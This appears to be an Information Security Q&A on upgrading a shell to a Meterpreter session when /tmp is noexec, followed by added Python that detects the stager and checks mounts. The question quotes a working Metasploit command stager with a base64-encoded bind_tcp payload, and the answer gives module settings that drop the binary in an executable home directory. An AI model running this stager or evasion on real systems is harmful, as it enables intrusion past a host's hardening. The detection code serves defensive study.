Information Security Asked by h f on February 5, 2021
I am trying to achieve a meterpreter session on a test machine (the "victim") that I already have a shell session on. When I run the command sessions -u #, where # corresponds to the number of the shell session, I receive an error because metasploit tries to create and execute a payload on the victim in the /tmp directory, which is set to be non-executable. In other words, nothing can be executed from the /tmp directory on the victim machine.

Is there a way for me to specify where this executable file is created and executed on the victim machine?
linux/x86/meterpreter/bind_tcp payload. Instead of being placed in /tmp and called something random such as abc123, I would want to have the payload placed in a known location that allows execution such as /home/Bob. /home/Bob/abc123 will then execute and start the meterpreter session.

[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]
Note the execution of the /tmp/tDGmH file toward the end of the command. This is the part of the command that is failing for me due to the /tmp directory being set to non-executable.
Could possibly involve making changes to this file: https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb
The sessions -u command is actually a post/multi/manage/shell_to_meterpreter with predefined options. If you see the advanced options for that module (with show advanced), you should notice it has:

Name              Required  Description
----              --------  -----------
BOURNE_FILE       no        Remote filename to use for dropped binary
BOURNE_PATH       no        Remote path to drop binary
PAYLOAD_OVERRIDE  no        Define the payload to use
Therefore, what you are trying to do should be possible with:
use post/multi/manage/shell_to_meterpreter
set SESSION 2
set BOURNE_PATH /home/Bob
set PAYLOAD_OVERRIDE linux/x86/meterpreter/bind_tcp
run
Answered by Esa Jokinen on February 5, 2021
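As an added example from the defender's side (not part of the question or the answer, and not Metasploit's own code), the Python below recognises the drop/decode/chmod/execute/cleanup shape of the command stager quoted in the question in a captured shell command line, and checks the drop directory against a mount table in /proc/mounts format to decide whether a noexec mount would have stopped the dropped binary, which is exactly the failure the question reports. The file names, the base64 blob and the mount table are constructed sample data; the helper names (detect_bourne_stager, assess, and so on) are mine.

```python
"""Added example: flag the bourne command-stager shape in a captured command
and test the drop path against noexec mounts. All sample data is constructed."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed mount table in /proc/mounts format: /tmp is noexec, /home is not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
"""

# Same shape as the stager in the question, with a constructed, non-functional
# base64 blob and constructed file names; the second variant drops under /home.
STAGER_TMP = (
    "echo -n QUJDRA==>>'/tmp/abcde.b64' ; ((which base64 >&2 && base64 -d -)) "
    "2> /dev/null > '/tmp/fghij' < '/tmp/abcde.b64' ; chmod +x '/tmp/fghij' ; "
    "'/tmp/fghij' ; rm -f '/tmp/fghij' ; rm -f '/tmp/abcde.b64'"
)
STAGER_HOME = STAGER_TMP.replace("/tmp/", "/home/Bob/")
BENIGN = "tar czf '/tmp/backup.tgz' /etc ; chmod +x '/usr/local/bin/run.sh'"

STAGE_WRITE = re.compile(r">>\s*'([^']+\.b64)'")                 # echo ... >> 'x.b64'
DECODE_OUT = re.compile(r"2>\s*/dev/null\s*>\s*'([^']+)'\s*<\s*'([^']+)'")  # decoder out < in
CHMOD_X = re.compile(r"chmod \+x '([^']+)'")
RM_F = re.compile(r"rm -f '([^']+)'")


@dataclass
class StagerHit:
    b64_path: str
    bin_path: str
    chmod: bool
    executes: bool
    cleans_up: bool


def detect_bourne_stager(cmd: str) -> Optional[StagerHit]:
    """Return a StagerHit when cmd writes a .b64 file, decodes it into a
    second file, and that second file is then chmod'ed, run and removed."""
    m_write = STAGE_WRITE.search(cmd)
    m_decode = DECODE_OUT.search(cmd)
    if not (m_write and m_decode):
        return None
    b64_path = m_write.group(1)
    bin_path, decode_src = m_decode.group(1), m_decode.group(2)
    if decode_src != b64_path:          # decoder must read the file just written
        return None
    m_chmod = CHMOD_X.search(cmd)
    chmod = m_chmod is not None and m_chmod.group(1) == bin_path
    executes = f"; '{bin_path}' ;" in cmd   # the bare path run as its own command
    removed = set(RM_F.findall(cmd))
    return StagerHit(b64_path, bin_path, chmod, executes, {b64_path, bin_path} <= removed)


def parse_mounts(text: str):
    """(mount point, option set) pairs from /proc/mounts-style lines."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            mounts.append((parts[1], set(parts[3].split(","))))
    return mounts


def mount_for(path: str, mounts):
    """Longest mount point that is a prefix of path (None if no match)."""
    best = None
    for mp, opts in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best[0]):
                best = (mp, opts)
    return best


def is_noexec(path: str, mounts) -> bool:
    m = mount_for(path, mounts)
    return m is not None and "noexec" in m[1]


def assess(cmd: str, mounts_text: str = SAMPLE_MOUNTS) -> dict:
    """Combine detection with the mount check: would noexec have blocked the drop?"""
    hit = detect_bourne_stager(cmd)
    if hit is None:
        return {"stager": False}
    mounts = parse_mounts(mounts_text)
    mp = mount_for(hit.bin_path, mounts)
    return {
        "stager": True,
        "bin_path": hit.bin_path,
        "mount_point": mp[0] if mp else None,
        "blocked_by_noexec": is_noexec(hit.bin_path, mounts),
        "full_chain": hit.chmod and hit.executes and hit.cleans_up,
    }


if __name__ == "__main__":
    for label, cmd in (("tmp", STAGER_TMP), ("home", STAGER_HOME), ("benign", BENIGN)):
        print(label, assess(cmd))
```

On a noexec mount the stager's chmod +x still succeeds; it is the direct invocation of the file that fails with "Permission denied", which is the step the question points at. The mount check therefore tells a defender which writable directories lack noexec, and a detection on the write/decode/chmod/run/remove chain catches the stager regardless of which directory BOURNE_PATH selects.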